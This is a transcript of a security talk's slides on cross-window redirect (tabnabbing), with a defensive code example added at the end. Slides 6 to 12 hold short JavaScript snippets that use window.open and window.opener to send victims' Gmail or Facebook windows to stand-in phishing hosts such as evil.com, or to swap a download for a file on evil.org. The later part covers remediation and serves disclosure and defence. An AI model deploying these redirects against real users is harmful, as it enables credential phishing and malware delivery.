The Cross Window redirect
Transcript of The Cross Window redirect
Slide 1: Cross Window Redirect
Khaled Hawasli, Michael Hendrickx
Slide 2: Who are we?
• Khaled Hawasli – Manager Security Analysis @ HelpAG
• Michael Hendrickx – Security Analyst @ HelpAG
Slide 3: Preface
• Social Engineering becomes more sophisticated
• People don't fall for the "click here" trick
  – Receive email with link
  – Click link
  – Presented with login screen
Slide 5: Cross-Window Redirect
• Exploiting opened windows using JS
• Hyperlinks redirected without the user noticing
• Works on all browsers
• 2 variants:
  – Child window redirect
  – Parent window redirect
Slide 6: Child window redirect
• Control the link you just opened
Diagram: Parent Window = the attacker's site (controlling window); Child Window = the targeted site (controlled window).
1. Opens Gmail with window.open()
2. Redirect to fake phishing page

```javascript
// Runs in the attacker's page (the parent). Step 1: open the targeted site.
var childWindow = window.open('https://mail.google.com');
// Step 2: the parent keeps a handle to the child and can navigate it at any time.
childWindow.location = 'http://mail.google.com.evil.com/gmail/login.php';
```
Slide 7: X-windows redirect demo
• Let's get malware to users
  – Let's watch a movie
  – We need a movie player
http://michaelhendrickx.com/misc/sf.html
Slide 8: X-windows redirect explained
• Link to SF to download software
  – Rewrite the link before the countdown

```javascript
// Open the SourceForge download page in a new window (path elided on the slide).
var sf = window.open('http://sourceforge.net/...');
// Before SourceForge's download countdown ends, point the child at a different file.
setTimeout(function () {
  sf.location = 'http://evil.org/nmap.tar.gz';
}, 4000);
```
Slide 9: Multiple ways to attack this
• setTimeout():
  – Wait for a while and redirect the page.
• Interactive:
  – Server polling using XHR
  – Attacker can flip the page on demand
• HTML5 Visibility API:
  – Flip the page when the user is not looking
https://github.com/ndrix/xwindow-redirect
Slide 10: Parent Window Redirect
• "Evil child" can control the parent
Diagram: Parent Window = the targeted site (controlled window); Child Window = the attacker site (controlling window).
1. Opens website with window.open()
2. Child redirects the parent

```javascript
// Step 1, in the targeted site (the parent): a link handler opens the attacker's page.
window.open('http://mywebsite.com');

// Step 2, in the attacker's page (the child): window.opener refers to the parent,
// so assigning its location navigates the parent window.
window.opener.location = 'http://evil.com/gmail/login.php';
```
Slide 11: Parent window redirect: demo
• Emirates has some crazy deals!
(Click Facebook message)
Slide 12: Parent window redirect: demo
• Emirates has some crazy deals!

```html
<!DOCTYPE html>
<html>
<head><title>Crazy deals from Emirates.com</title></head>
<body>
<img src="ek.jpg"/>
<script>
  // Child page: send the opener (Facebook) to the fake "session logged out" page ...
  window.opener.location = 'http://fakefacebook.com';
  // ... then replace itself with the legitimate deals page so nothing looks wrong.
  window.location = 'http://www.emirates.com/ae/…';
</script>
</body>
</html>
```
Slide 13: Parent window redirect: demo
• User may spend long enough on the target site, believing that Facebook timed out.
Parent Window / Child Window:
1. Open child with window.open()
2. Redirect Facebook to fake "session logged out"
3. Refresh itself to legitimate site
Slide 14: Other sites that use window.open()
• Facebook, Amazon widget, …
• GMail schema.org
Slide 15: Remediation
• Don't use window.open() to open hyperlinks
  – Those links may control your page
• Verify if your page was opened from another page
  – if (window.opener && !window.opener.closed) { ... }
• Preferably, browsers should use X-Frame-Options header for these JS links
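Added example (not from the slides or the authors' xwindow-redirect repo): defender-side handling of window.opener in JavaScript. It wraps slide 15's opener check and, as an addition the slides do not name, the "noopener" pattern of opening about:blank, nulling the child's opener while it is still same-origin, and only then navigating it; `win` stands for a browser window object, and the stub window is constructed so the functions can be exercised offline.

```javascript
// Open `url` so the new window gets no reference back to this one.
// about:blank is same-origin with us, so we may still set its `opener`;
// after it navigates cross-origin we could not. Not on the slides.
function openWithoutOpener(win, url) {
  const child = win.open("about:blank");
  if (!child) return null;      // popup blocked
  child.opener = null;          // child's `window.opener.location = ...` now has no target
  child.location = url;
  return child;
}

// Slide 15's check: was this page opened by another page that is still open?
// Returns true when so, so the caller can warn the user. With `sever` set it
// also drops our reference to the opener. For the child-window variant the
// opener may still navigate us, so this is detection, not prevention.
function openedByAnotherPage(win, sever = false) {
  const opened = Boolean(win.opener && !win.opener.closed);
  if (opened && sever) win.opener = null;
  return opened;
}

// Constructed stub standing in for a browser window object (testing only).
function makeStubWindow(opener = null) {
  const w = { opener, closed: false, location: "about:blank" };
  w.open = function () {
    return { opener: w, closed: false, location: "about:blank" };
  };
  return w;
}
```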
Slide 16: Thank you!
Any questions?